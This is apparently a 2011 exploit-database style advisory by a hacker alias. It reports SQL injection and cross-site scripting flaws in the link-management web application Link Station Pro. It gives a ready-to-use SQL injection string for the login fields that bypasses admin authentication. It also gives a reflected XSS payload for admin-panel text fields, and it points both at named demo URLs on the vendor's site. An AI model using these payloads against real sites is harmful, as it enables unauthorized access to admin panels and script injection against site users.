Link Station Pro suffers from cross site scripting and remote SQL injection vulnerabilities. The SQL injection vulnerability allows for authentication bypass.
af6a8e253f03e46cdce73f0204bfe883d6c68700b467b7d4fa19ab3006bd297b
%+
$.......#........4.........|)........0............\/\/ %+
%+
%+
%++++++++++++++++++++++++++++++++++++++++
# Exploit Title: Link Station Pro Multiple Vulnerabilities
# Vendor: www.linkstationpro.com
# Date: 28th july,2011
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D (
http://www.shadowrootkit.wordpress.com)
# Google Dork: © 2011 Copyright SteveDawson.com
*****************************************************************************************************************************************************************************************
BREIF DESCRIPTION
*****************************
Link Station Pro is without doubt, the most efficient, easiest and most
configurable reciprocal link management tool available for all your
reciprocal link requirements.
******************************************************************************************************************************************************************************************
(Auth ByPass) SQLi Vulnerability
***************************************
{DEMO} : http://www.linkstationpro.com/Partners/admindemo/index.php
EXPLOIT:
Username: ' or 'bug'='bug' #
Password: ' or 'bug'='bug' #
Observe: Attackers can use Authentication Bypass to get into Admin Panel in
the site.
Reflected XSS Vulnerability
********************************
EXPLOIT 2: XSS Vulnerability in admin panel(in most of the text fields)
{Demo}:
http://www.linkstationpro.com/Partners/admindemo/manage_categories.php
Exploit: ">><marquee><h1>XSSed_by_r007k17</h1></marquee>
*****************************************************************************************************************************************************************************************
gr33t1ngs to s1d3 effects and my friends@!3.14--
*****************************************************************************************************************************************************************************************